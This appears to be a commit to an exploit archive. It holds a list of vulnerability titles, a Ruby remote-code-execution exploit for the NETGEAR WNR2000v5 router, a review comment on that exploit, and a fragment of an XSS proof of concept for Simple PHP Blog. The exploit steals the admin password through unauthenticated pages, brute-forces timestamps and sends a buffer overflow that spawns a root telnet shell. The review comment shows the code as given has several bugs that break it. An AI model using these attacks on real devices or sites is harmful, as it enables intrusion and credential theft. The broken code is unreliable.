File Inclusion / SQL Injection) Multiple Vulnerabilities pastelcms 0.8.0 - Local File Inclusion / SQL Injection mixedcms 1.0b - (Local File Inclusion / Arbitrary File Upload / Authentication Bypass/File Disclosure) Multiple Vulnerabilities mixedcms 1.0b - Local File Inclusion / Arbitrary File Upload / Authentication Bypass / File Disclosure fowlcms 1.1 - (Authentication Bypass / Local File Inclusion / Arbitrary File Upload) Multiple Vulnerabilities fowlcms 1.1 - Authentication Bypass / Local File Inclusion / Arbitrary File Upload photo-rigma.biz 30 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities photo-rigma.biz 30 - SQL Injection / Cross-Site Scripting Dew-NewPHPLinks 2.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities Dew-NewPHPLinks 2.0 - Local File Inclusion / Cross-Site Scripting Leap CMS 0.1.4 - (SQL Injection / Cross-Site Scripting / Arbitrary File Upload) Multiple Vulnerabilities Leap CMS 0.1.4 - SQL Injection / Cross-Site Scripting / Arbitrary File Upload TemaTres 1.0.3 - (Authentication Bypass / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities TemaTres 1.0.3 - Authentication Bypass / SQL Injection / Cross-Site Scripting PHP recommend 1.3 - (Authentication Bypass / Remote File Inclusion / Code Inject) Multiple Vulnerabilities PHP recommend 1.3 - Authentication Bypass / Remote File Inclusion / Code Inject my-colex 1.4.2 - (Authentication Bypass / Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities my-gesuad 0.9.14 - (Authentication Bypass / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities my-colex 1.4.2 - Authentication Bypass / Cross-Site Scripting / SQL Injection my-gesuad 0.9.14 - Authentication Bypass / SQL Injection / Cross-Site Scripting vidshare pro - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities vidshare pro - SQL Injection / Cross-Site Scripting asp inline Corporate Calendar - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities asp inline 
Corporate Calendar - SQL Injection / Cross-Site Scripting minitwitter 0.3-beta - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities minitwitter 0.3-beta - SQL Injection / Cross-Site Scripting small pirate 2.1 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities amember 3.1.7 - (Cross-Site Scripting / SQL Injection / HTML Injection) Multiple Vulnerabilities small pirate 2.1 - Cross-Site Scripting / SQL Injection amember 3.1.7 - Cross-Site Scripting / SQL Injection / HTML Injection elitecms 1.01 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities elitecms 1.01 - SQL Injection / Cross-Site Scripting flashlight free edition - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities flashlight free edition - Local File Inclusion / SQL Injection propertymax pro free - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities propertymax pro free - SQL Injection / Cross-Site Scripting virtue news - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities virtue news - SQL Injection / Cross-Site Scripting mrcgiguy freeticket - (Cookie Handling / SQL Injection) Multiple Vulnerabilities mrcgiguy freeticket - Cookie Handling / SQL Injection yogurt 0.3 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities yogurt 0.3 - Cross-Site Scripting / SQL Injection campus virtual-lms - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities campus virtual-lms - Cross-Site Scripting / SQL Injection translucid 1.75 - Multiple Vulnerabilities TransLucid 1.75 - Multiple Vulnerabilities impleo music Collection 2.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities impleo music Collection 2.0 - SQL Injection / Cross-Site Scripting adaptweb 0.9.2 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities adaptweb 0.9.2 - Local File Inclusion / SQL Injection CMS buzz - (Cross-Site Scripting / Password Change/HTML Injection) Multiple Vulnerabilities CMS buzz - Cross-Site Scripting / Password 
Change / HTML Injection elgg - (Cross-Site Scripting / Cross-Site Request Forgery/Change Password) Multiple Vulnerabilities elgg - Cross-Site Scripting / Cross-Site Request Forgery / Change Password phpCollegeExchange 0.1.5c - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities phpCollegeExchange 0.1.5c - Remote File Inclusion / Local File Inclusion / Cross-Site Scripting Tribiq CMS 5.0.12c - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities Tribiq CMS 5.0.12c - Cross-Site Scripting / Local File Inclusion Virtue Online Test Generator - (Authentication Bypass / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities Virtue Online Test Generator - Authentication Bypass / SQL Injection / Cross-Site Scripting webasyst shop-script - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities webasyst shop-script - Blind SQL Injection / Cross-Site Scripting ebay clone 2009 - (Cross-Site Scripting / Blind SQL Injection) Multiple Vulnerabilities ebay clone 2009 - Cross-Site Scripting / Blind SQL Injection censura 1.16.04 - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities censura 1.16.04 - Blind SQL Injection / Cross-Site Scripting good/bad vote - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities good/bad vote - Cross-Site Scripting / Local File Inclusion mcshoutbox 1.1 - (SQL Injection / Cross-Site Scripting / shell) Multiple Vulnerabilities mcshoutbox 1.1 - SQL Injection / Cross-Site Scripting / shell Million-Dollar Pixel Ads Platinum - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities Million-Dollar Pixel Ads Platinum - SQL Injection / Cross-Site Scripting almond Classifieds ads - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities skadate dating - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities XOOPS Celepar Module Qas - (Blind SQL Injection / Cross-Site Scripting) 
Multiple Vulnerabilities garagesalesjunkie - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities almond Classifieds ads - Blind SQL Injection / Cross-Site Scripting skadate dating - Remote File Inclusion / Local File Inclusion / Cross-Site Scripting XOOPS Celepar Module Qas - Blind SQL Injection / Cross-Site Scripting garagesalesjunkie - SQL Injection / Cross-Site Scripting iwiccle 1.01 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities iwiccle 1.01 - Local File Inclusion / SQL Injection Orbis CMS 1.0 - (File Delete/Download File / Arbitrary File Upload / SQL Injection) Multiple Vulnerabilities Orbis CMS 1.0 - File Delete / Download File / Arbitrary File Upload / SQL Injection cmsphp 0.21 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities d.net CMS - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities cmsphp 0.21 - Local File Inclusion / Cross-Site Scripting d.net CMS - Local File Inclusion / SQL Injection mobilelib gold 3.0 - (Authentication Bypass / SQL Injection) Multiple Vulnerabilities mobilelib gold 3.0 - Authentication Bypass / SQL Injection elvin bts 1.2.2 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities elvin bts 1.2.2 - SQL Injection / Cross-Site Scripting shopmaker CMS 2.0 - (Blind SQL Injection / Local File Inclusion) Multiple Vulnerabilities shopmaker CMS 2.0 - Blind SQL Injection / Local File Inclusion mybackup 1.4.0 - (File Download / Remote File Inclusion) Multiple Vulnerabilities tenrok 1.1.0 - (File Disclosure / Remote Code Execution) Multiple Vulnerabilities mybackup 1.4.0 - File Download / Remote File Inclusion tenrok 1.1.0 - File Disclosure / Remote Code Execution AccessoriesMe PHP Affiliate Script 1.4 - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities opennews 1.0 - (SQL Injection / Remote Code Execution) Multiple Vulnerabilities AccessoriesMe PHP Affiliate Script 1.4 - Blind SQL Injection / Cross-Site Scripting opennews 1.0 - SQL Injection / 
Remote Code Execution PHP Script Forum Hoster - (Topic Delete / Cross-Site Scripting) Multiple Vulnerabilities PHP Script Forum Hoster - Topic Delete / Cross-Site Scripting LM Starmail 2.0 - (SQL Injection / File Inclusion) Multiple Vulnerabilities LM Starmail 2.0 - SQL Injection / File Inclusion logoshows bbs 2.0 - (File Disclosure / Insecure Cookie Handling) Multiple Vulnerabilities logoshows bbs 2.0 - File Disclosure / Insecure Cookie Handling tgs CMS 0.x - (Cross-Site Scripting / SQL Injection / File Disclosure) Multiple Vulnerabilities tgs CMS 0.x - Cross-Site Scripting / SQL Injection / File Disclosure Vtiger CRM 5.0.4 - (Remote Code Execution / Cross-Site Request Forgery / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities Vtiger CRM 5.0.4 - Remote Code Execution / Cross-Site Request Forgery / Local File Inclusion / Cross-Site Scripting totalcalendar 2.4 - (Blind SQL Injection / Local File Inclusion) Multiple Vulnerabilities totalcalendar 2.4 - Blind SQL Injection / Local File Inclusion nullam blog 0.1.2 - (Local File Inclusion / File Disclosure / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities nullam blog 0.1.2 - Local File Inclusion / File Disclosure / SQL Injection / Cross-Site Scripting gyro 5.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities gyro 5.0 - SQL Injection / Cross-Site Scripting Joomla! Component Hotel Booking System - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities Joomla! 
Component Hotel Booking System - Cross-Site Scripting / SQL Injection Micro CMS 3.5 - (SQL Injection / Local File Inclusion) Multiple Vulnerabilities Micro CMS 3.5 - SQL Injection / Local File Inclusion Ez Blog 1.0 - (Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities Ez Blog 1.0 - Cross-Site Scripting / Cross-Site Request Forgery Recipe Script 5.0 - (Arbitrary File Upload / Cross-Site Request Forgery / Cross-Site Scripting) Multiple Vulnerabilities Recipe Script 5.0 - Arbitrary File Upload / Cross-Site Request Forgery / Cross-Site Scripting eUploader PRO 3.1.1 - (Cross-Site Request Forgery / Cross-Site Scripting) Multiple Vulnerabilities eUploader PRO 3.1.1 - Cross-Site Request Forgery / Cross-Site Scripting Pre Job Board 1.0 - SQL Bypass Pre Job Board 1.0 - SQL Authentication Bypass Pre Jobo .NET - SQL Bypass Pre Jobo .NET - SQL Authentication Bypass PHPDirector Game Edition 0.1 - (Local File Inclusion / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities PHPDirector Game Edition 0.1 - Local File Inclusion / SQL Injection / Cross-Site Scripting gridcc script 1.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities gridcc script 1.0 - SQL Injection / Cross-Site Scripting Layout CMS 1.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities Layout CMS 1.0 - SQL Injection / Cross-Site Scripting KosmosBlog 0.9.3 - (SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities KosmosBlog 0.9.3 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery ZeusCMS 0.2 - (Database Backup Dump / Local File Inclusion) Multiple Vulnerabilities ZeusCMS 0.2 - Database Backup Dump / Local File Inclusion Katalog Stron Hurricane 1.3.5 - (Remote File Inclusion / SQL Injection) Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Remote File Inclusion / SQL Injection Open Source Classifieds 1.1.0 - Alpha (OSClassi) Multiple Vulnerabilities Open Source Classifieds 1.1.0 Alpha 
(OSClassi) - SQL Injection / Cross-Site Scripting / Arbitrary Admin Change phpMySite - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities phpMySite - Cross-Site Scripting / SQL Injection quality point 1.0 newsfeed - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities quality point 1.0 newsfeed - SQL Injection / Cross-Site Scripting DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities DynPG CMS 4.1.0 - popup.php / counter.php Multiple Vulnerabilities jevoncms - (Local File Inclusion / Remote File Inclusion) Multiple Vulnerabilities jevoncms - Local File Inclusion / Remote File Inclusion SIESTTA 2.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities SIESTTA 2.0 - Local File Inclusion / Cross-Site Scripting JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - 'popup_slideshow.php' Multiple Vulnerabilities parlic Design - (SQL Injection / Cross-Site Scripting / HTML Injection) Multiple Vulnerabilities parlic Design - SQL Injection / Cross-Site Scripting / HTML Injection MileHigh Creative - (SQL Injection / Cross-Site Scripting / HTML Injection) Multiple Vulnerabilities MileHigh Creative - SQL Injection / Cross-Site Scripting / HTML Injection QuickTalk 1.2 - (Source Code Disclosure) Multiple Vulnerabilities QuickTalk 1.2 - Source Code Disclosure K-Search - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities K-Search - SQL Injection / Cross-Site Scripting Macs CMS 1.1.4 - (Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities Macs CMS 1.1.4 - Cross-Site Scripting / Cross-Site Request Forgery Guestbook Script PHP - (Cross-Site Scripting / HTML Injection) Multiple Vulnerabilities Guestbook Script PHP - Cross-Site Scripting / HTML Injection Max's Guestbook - (HTML Injection / Cross-Site Scripting) Multiple Vulnerabilities Max's Guestbook - HTML Injection / Cross-Site Scripting Allpc 2.5 osCommerce - (SQL Injection / Cross-Site 
Scripting) Multiple Vulnerabilities Allpc 2.5 osCommerce - SQL Injection / Cross-Site Scripting TradeMC E-Ticaret - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities TradeMC E-Ticaret - SQL Injection / Cross-Site Scripting Cag CMS 0.2 - (Cross-Site Scripting / Blind SQL Injection) Multiple Vulnerabilities Cag CMS 0.2 - Cross-Site Scripting / Blind SQL Injection Tastydir 1.2 - (1216) Multiple Vulnerabilities Tastydir 1.2 (1216) - Multiple Vulnerabilities WordPress - 'do_trackbacks()' function SQL Injection WordPress 3.0.1 - 'do_trackbacks()' function SQL Injection F3Site 2011 alfa 1 - (Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities F3Site 2011 alfa 1 - Cross-Site Scripting / Cross-Site Request Forgery PHP Coupon Script 6.0 - (bus) Blind SQL Injection PHP Coupon Script 6.0 - 'bus' Parameter Blind SQL Injection GAzie 5.10 - (Login Parameter) Multiple Vulnerabilities GAzie 5.10 - Login Parameter Multiple Vulnerabilities BST - BestShopPro (nowosci.php) Multiple Vulnerabilities BST (BestShopPro) - 'nowosci.php' Multiple Vulnerabilities Fork CMS 3.2.4 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities Fork CMS 3.2.4 - Local File Inclusion / Cross-Site Scripting DFLabs PTK 1.0.5 - (Steal Authentication Credentials) Multiple Vulnerabilities DFLabs PTK 1.0.5 - Steal Authentication Credentials Wolfcms 0.75 - (Cross-Site Request Forgery / Cross-Site Scripting) Multiple Vulnerabilities Wolfcms 0.75 - Cross-Site Request Forgery / Cross-Site Scripting Axous 1.1.1 - (Cross-Site Request Forgery / Persistent Cross-Site Scripting) Multiple Vulnerabilities Axous 1.1.1 - Cross-Site Request Forgery / Persistent Cross-Site Scripting myPHPNuke 1.8.8 - links.php Cross-Site Scripting myPHPNuke 1.8.8 - 'links.php' Cross-Site Scripting Flying Dog Software Powerslave 4.3 Portalmanager - sql_id Information Disclosure Flying Dog Software Powerslave 4.3 Portalmanager - 'sql_id' Information Disclosure PHPWebGallery 1.3.4/1.5.1 - 
comments.php Multiple Parameter SQL Injection PHPWebGallery 1.3.4/1.5.1 - category.php search Parameter SQL Injection PHPWebGallery 1.3.4/1.5.1 - picture.php image_id Parameter SQL Injection PHPWebGallery 1.3.4/1.5.1 - 'comments.php' SQL Injection PHPWebGallery 1.3.4/1.5.1 - 'category.php' SQL Injection PHPWebGallery 1.3.4/1.5.1 - 'picture.php' SQL Injection myPHPNuke 1.8.8 - reviews.php letter Parameter Cross-Site Scripting myPHPNuke 1.8.8 - download.php dcategory Parameter Cross-Site Scripting myPHPNuke 1.8.8 - 'reviews.php' Cross-Site Scripting myPHPNuke 1.8.8 - 'download.php' Cross-Site Scripting phpVID 1.2.3 - Multiple Vulnerabilities PHPVID 1.2.3 - Multiple Vulnerabilities PHPWebGallery 1.4.1 - category.php Multiple Parameter Cross-Site Scripting PHPWebGallery 1.4.1 - picture.php Multiple Parameter Cross-Site Scripting PHPWebGallery 1.4.1 - 'category.php' Cross-Site Scripting PHPWebGallery 1.4.1 - 'picture.php' Cross-Site Scripting phpMyAdmin 2.7 - sql.php Cross-Site Scripting phpMyAdmin 2.7 - 'sql.php' Cross-Site Scripting ADOdb 4.6/4.7 - Tmssql.php Cross-Site Scripting ADODB 4.6/4.7 - 'Tmssql.php' Cross-Site Scripting PHPWebGallery 1.x - comments.php Cross-Site Scripting PHPWebGallery 1.x - 'comments.php' Cross-Site Scripting MySQLDumper 1.21 - sql.php Cross-Site Scripting MySQLDumper 1.21 - 'sql.php' Cross-Site Scripting KikChat - (Local File Inclusion / Remote Code Execution) Multiple Vulnerabilities KikChat - Local File Inclusion / Remote Code Execution EasyE-Cards 3.10 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities EasyE-Cards 3.10 - SQL Injection / Cross-Site Scripting LuxCal 3.2.2 - (Cross-Site Request Forgery/Blind SQL Injection) Multiple Vulnerabilities LuxCal 3.2.2 - Cross-Site Request Forgery / Blind SQL Injection Vastal I-Tech DVD Zone - view_mag.php mag_id Parameter SQL Injection Vastal I-Tech DVD Zone - view_mag.php mag_id Parameter Cross-Site Scripting Vastal I-Tech DVD Zone - 'view_mag.php' SQL Injection Vastal I-Tech DVD 
Zone - 'view_mag.php' Cross-Site Scripting Interspire Email Marketer - (Cross-Site Scripting / HTML Injection / SQL Injection) Multiple Vulnerabilities Interspire Email Marketer - Cross-Site Scripting / HTML Injection / SQL Injection ManageEngine EventLog Analyzer < 10.6 build 10060 - SQL Query Execution ManageEngine EventLog Analyzer < 10.6 build 10060 - SQL Execution miniMySQLAdmin 1.1.3 - Cross-Site Request Forgery (Execute SQL Query) miniMySQLAdmin 1.1.3 - Cross-Site Request Forgery (SQL Execution) ntop-ng 2.5.160805 - Username Enumeration ntop-ng 2.5.160805 - Username Enumeration
This commit is contained in:
parent be57520c6f
commit a099e58626
9 changed files with 873 additions and 342 deletions
platforms/cgi/remote/40949.rb (executable file, 428 additions)
@ -0,0 +1,428 @@
#
# Source: https://raw.githubusercontent.com/pedrib/PoC/master/exploits/netgearPwn.rb
#
# Remote code execution in NETGEAR WNR2000v5
# - by Pedro Ribeiro (pedrib@gmail.com) / Agile Information Security
# Released on 20/12/2016
#
# NOTE: this exploit is "alpha" quality, however the bof method should work fine both with or without reboot.
# A more reliable Metasploit module will be released soon.
#
#
# TODO:
# - test default credentials first (with correct and incorrect password, see if auth can be used by default with incorrect password)
# - finish telnetenable (get mac and send packet)
# - finish timestamp regex (?)
# - randomise payload

require 'net/http'
require 'uri'
require 'time'

####################
# ported from https://git.uclibc.org/uClibc/tree/libc/stdlib/random.c
# and https://git.uclibc.org/uClibc/tree/libc/stdlib/random_r.c

TYPE_3 = 3
BREAK_3 = 128
DEG_3 = 31
SEP_3 = 3

@randtbl =
[
# we omit TYPE_3 from here, not needed
-1726662223, 379960547, 1735697613, 1040273694, 1313901226,
1627687941, -179304937, -2073333483, 1780058412, -1989503057,
-615974602, 344556628, 939512070, -1249116260, 1507946756,
-812545463, 154635395, 1388815473, -1926676823, 525320961,
-1009028674, 968117788, -123449607, 1284210865, 435012392,
-2017506339, -911064859, -370259173, 1132637927, 1398500161,
-205601318,
]

@unsafe_state = {
"fptr" => SEP_3,
"rptr" => 0,
"state" => 0,
"rand_type" => TYPE_3,
"rand_deg" => DEG_3,
"rand_sep" => SEP_3,
"end_ptr" => DEG_3
}

# Emulate the behaviour of C's srand
def srandom_r (seed)
state = @randtbl
if seed == 0
seed = 1
end
state[0] = seed

dst = 0
word = seed
kc = DEG_3
for i in 1..(kc-1)
hi = word / 127773
lo = word % 127773
word = 16807 * lo - 2836 * hi
if (word < 0)
word += 2147483647
end
dst += 1
state[dst] = word
end

@unsafe_state['fptr'] = @unsafe_state['rand_sep']
@unsafe_state['rptr'] = 0

kc *= 10
kc -= 1
while (kc >= 0)
random_r
kc -= 1
end
end

# Emulate the behaviour of C's rand
def random_r
buf = @unsafe_state
state = buf['state']

fptr = buf['fptr']
rptr = buf['rptr']
end_ptr = buf['end_ptr']
val = @randtbl[fptr] += @randtbl[rptr]

result = (val >> 1) & 0x7fffffff
fptr += 1
if (fptr >= end_ptr)
fptr = state
rptr += 1
else
rptr += 1
if (rptr >= end_ptr)
rptr = state
end
end
buf['fptr'] = fptr
buf['rptr'] = rptr

result
end
#####################

#####################
# Ruby code ported from https://github.com/insanid/netgear-telenetenable
#
def telnetenable (mac, username, password)
mac_pad = mac.gsub(':', '').upcase.ljust(0x10,"\x00")
username_pad = username.ljust(0x10, "\x00")
password_pad = password.ljust(0x21, "\x00")
cleartext = (mac_pad + username_pad + password_pad).ljust(0x70, "\x00")

md5 = Digest::MD5.new
md5.update(cleartext)
payload = (md5.digest + cleartext).ljust(0x80, "\x00").unpack('N*').pack('V*')

secret_key = "AMBIT_TELNET_ENABLE+" + password
cipher = OpenSSL::Cipher::Cipher.new("bf-ecb").send :encrypt
cipher.key_len = secret_key.length
cipher.key = secret_key
cipher.padding = 0
binary_data = (cipher.update(payload) << cipher.final)

binary_data.unpack('N*').pack('V*')
end
#####################

# Do some crazyness to force Ruby to cast to a single-precision float and
# back to an integer.
# This emulates the behaviour of the soft-fp library and the float cast
# which is done at the end of Netgear's timestamp generator.
def ieee754_round (number)
[number].pack('f').unpack('f*')[0].to_i
end


# This is the actual algorithm used in the get_timestamp function in
# the Netgear firmware.
def get_timestamp(time)
srandom_r time
t0 = random_r
t1 = 0x17dc65df;
hi = (t0 * t1) >> 32;
t2 = t0 >> 31;
t3 = hi >> 23;
t3 = t3 - t2;
t4 = t3 * 0x55d4a80;
t0 = t0 - t4;
t0 = t0 + 0x989680;

ieee754_round(t0)
end

# Default credentials for the router
USERNAME = "admin"
PASSWORD = "password"

def get_request(uri_str)
uri = URI.parse(uri_str)
http = Net::HTTP.new(uri.host, uri.port)
#http.set_debug_output($stdout)
request.basic_auth(USERNAME, PASSWORD)
request = Net::HTTP::Get.new(uri.request_uri)
http.request(request)
end

def post_request(uri_str, body)
uri = URI.parse(uri_str)
header = { 'Content-Type' => 'application/x-www-form-urlencoded' }
http = Net::HTTP.new(uri.host, uri.port)
#http.set_debug_output($stdout)
request.basic_auth(USERNAME, PASSWORD)
request = Net::HTTP::Post.new(uri.request_uri, header)
request.body = body
http.request(request)
end

def check
response = get_request("http://#{@target}/")
auth = response['WWW-Authenticate']
if auth != nil
if auth =~ /WNR2000v5/
puts "[+] Router is vulnerable and exploitable (WNR2000v5)."
return
elsif auth =~ /WNR2000v4/ || auth =~ /WNR2000v3/
puts "[-] Router is vulnerable, but this exploit might not work (WNR2000v3 or v4)."
return
end
end
puts "Router is not vulnerable."
end

def get_password
response = get_request("http://#{@target}/BRS_netgear_success.html")
if response.body =~ /var sn="([\w]*)";/
serial = $1
else
puts "[-]Failed to obtain serial number, bailing out..."
exit(1)
end

# 1: send serial number
response = post_request("http://#{@target}/apply_noauth.cgi?/unauth.cgi", "submit_flag=match_sn&serial_num=#{serial}&continue=+Continue+")

# 2: send answer to secret questions
response = post_request("http://#{@target}/apply_noauth.cgi?/securityquestions.cgi", \
"submit_flag=security_question&answer1=secretanswer1&answer2=secretanswer2&continue=+Continue+")

# 3: PROFIT!!!
response = get_request("http://#{@target}/passwordrecovered.cgi")

if response.body =~ /Admin Password: (.*)<\/TD>/
password = $1
else
puts "[-] Failed to obtain admin password, bailing out..."
exit(1)
end

if response.body =~ /Admin Username: (.*)<\/TD>/
username = $1
else
puts "[-] Failed to obtain admin username, bailing out..."
exit(1)
end

puts "[+] Success! Got admin username #{username} and password #{password}"
return [username, password]
end

def get_current_time
response = get_request("http://#{@target}/")

date = response['Date']
Time.parse(date).strftime('%s').to_i
end

def get_auth_timestamp(mode)
if mode == "bof"
uri_str = "lang_check.html"
else
uri_str = "PWD_password.htm"
end
response = get_request(uri_str)
if response.code == 401
# try again, might fail the first time
response = get_request(uri_str)
if response.code == 200
if response.body =~ /timestamp=([0-9]{8})/
$1.to_i
end
end
end
end

def got_shell
puts "[+] Success, shell incoming!"
exec("telnet #{@target.split(':')[0]}")
end

if ARGV.length < 2
puts "Usage: ./netgearPwn.rb <IP:PORT> <check|sploit|telnet> [noreboot]"
puts "\tcheck: see if the target is vulnerable"
puts "\tbof: run buffer overflow exploit on the target"
puts "\ttelnet: run telnet exploit on the target - DO NOT USE FOR NOW, DOESN'T WORK!"
puts "\tnoreboot: optional parameter - don't force a reboot on the target"
exit(1)
end

@target = ARGV[0]
mode = ARGV[1]

if ARGV.length == 3 && ARGV[2] == "noreboot"
reboot = false
else
reboot = true
end

# Maximum time differential to try
# Look 5000 seconds back for the timestamp with reboot
# 500000 with no reboot
if reboot
TIME_OFFSET = 5000
else
TIME_OFFSET = 500000
end

# Increase this if you're sure the device is vulnerable and you're not getting a shell
TIME_SURPLUS = 200

if mode == "check"
check
exit(0)
end

if mode == "bof"
def uri_encode (str)
"%" + str.scan(/.{2}|.+/).join("%")
end

def calc_address (libc_base, offset)
addr = (libc_base + offset).to_s(16)
uri_encode(addr)
end

system_offset = 0x547D0
gadget = 0x2462C
libc_base = 0x2ab24000

payload = 'a' * 36 + # filler_1
calc_address(libc_base, system_offset) + # s0
'1111' + # s1
'2222' + # s2
'3333' + # s3
calc_address(libc_base, gadget) + # gadget
'b' * 0x40 + # filler_2
"killall telnetenable; killall utelnetd; /usr/sbin/utelnetd -d -l /bin/sh" # payload
end

# 0: try to see if the default admin username and password are set
timestamp = get_auth_timestamp(mode)

# 1: reboot the router to get it to generate new timestamps
if reboot and timestamp == nil
response = post_request("http://#{@target}/apply_noauth.cgi?/reboot_waiting.htm", "submit_flag=reboot&yes=Yes")
if response.code == "200"
puts "[+] Successfully rebooted the router. Now wait two minutes for the router to restart..."
sleep 120
puts "[*] Connect to the WLAN or Ethernet now. You have one minute to comply."
sleep 60
else
puts "[-] Failed to reboot the router. Bailing out."
exit(-1)
end

puts "[*] Proceeding..."
end

# 2: get the current date from the router and parse it, but only if we are not authenticated...
if timestamp == nil
end_time = get_current_time
if end_time <= TIME_OFFSET
start_time = 0
else
start_time = end_time - TIME_OFFSET
end
end_time += TIME_SURPLUS

if end_time < (TIME_SURPLUS * 7.5).to_i
end_time = (TIME_SURPLUS * 7.5).to_i
end

puts "[+] Got time #{end_time} from router, starting exploitation attempt."
puts "[*] Be patient, this might take up a long time (typically a few minutes, but maybe an hour or more)."
end

if mode == "bof"
uri_str = "http://#{@target}/apply_noauth.cgi?/lang_check.html%20timestamp="
body = "submit_flag=select_language&hidden_lang_avi=#{payload}"
else
uri_str = "http://#{@target}/apply_noauth.cgi?/PWD_password.htm%20timestamp="
body = "submit_flag=passwd&hidden_enable_recovery=1&Apply=Apply&sysOldPasswd=&sysNewPasswd=&sysConfirmPasswd=&enable_recovery=on&question1=1&answer1=secretanswer1&question2=2&answer2=secretanswer2"
end

# 3: work back from the current router time minus TIME_OFFSET
while true
for time in end_time.downto(start_time)
begin
if timestamp == nil
response = post_request(uri_str + get_timestamp(time).to_s, body)
else
response = post_request(uri_str + timestamp.to_s, body)
end
if response.code == "200"
# this only occurs in the telnet case
credentials = get_password
#telnetenable(mac, credentials[0], credentials[1])
#sleep 5
#got_shell
puts "Done! Got admin username #{credentials[0]} and password #{credentials[1]}"
puts "Use the telnetenable.py script (https://github.com/insanid/netgear-telenetenable) to enable telnet, and connect to port 23 to get a root shell!"
exit(0)
end
rescue EOFError
if reboot
sleep 0.2
else
# with no reboot we give the router more time to breathe
sleep 0.5
end
begin
s = TCPSocket.new(@target.split(':')[0], 23)
s.close
got_shell
rescue Errno::ECONNREFUSED
if timestamp != nil
# this is the case where we can get an authenticated timestamp but we could not execute code
# IT SHOULD NEVER HAPPEN
# But scream and continue just in case, it means there is a bug
puts "[-] Something went wrong. We can obtain the timestamp with the default credentials, but we could not execute code."
puts "[*] Let's try again..."
timestamp = get_auth_timestamp
end
next
end
rescue Net::ReadTimeout
# for bof case, we land here
got_shell
end
end
if timestamp == nil
start_time = end_time - (TIME_SURPLUS * 5)
end_time = end_time + (TIME_SURPLUS * 5)
puts "[*] Going for another round, increasing end time to #{end_time} and start time to #{start_time}"
end
end

# If we get here then the exploit failed
puts "[-] Exploit finished. Failed to get a shell!"
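Review bot: in both `get_request` and `post_request`, `request.basic_auth(USERNAME, PASSWORD)` is called one line before `request` is assigned (`request = Net::HTTP::Get.new(uri.request_uri)` / `Net::HTTP::Post.new(uri.request_uri, header)`), so every HTTP call in the file raises NameError before anything is sent; swap the two lines in each helper. Further problems in the same hunk: `get_auth_timestamp` hands the bare paths `lang_check.html` and `PWD_password.htm` to `get_request`, whose `URI.parse` then yields no host for `Net::HTTP.new`, so they need the `http://#{@target}/` prefix the other callers use; `response.code == 401` and `response.code == 200` compare Net::HTTP's String code with an Integer and are never true, unlike the later `response.code == "200"` checks; the retry `timestamp = get_auth_timestamp` inside the `Errno::ECONNREFUSED` branch omits the required `mode` argument and would raise ArgumentError; `telnetenable` uses `Digest::MD5` and `OpenSSL::Cipher` while the file only requires net/http, uri and time, so add `require 'digest'` and `require 'openssl'` rather than relying on what net/http happens to load; and the usage line advertises `<check|sploit|telnet>` while the code dispatches on `bof`, which the help text below it also names.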
@ -14,7 +14,7 @@ document.forms[0].submit();
</script>

<form action="http://your-server/path-to-sphpblog/preview_cgi.php" method="post">
<input name="blog_text" value='</textarea><script>alert(document.cookie)</script>'/>
<input type="submit"/>
</form>

@ -5,7 +5,7 @@ Simple PHP Blog is prone to multiple input validation vulnerabilities. These iss
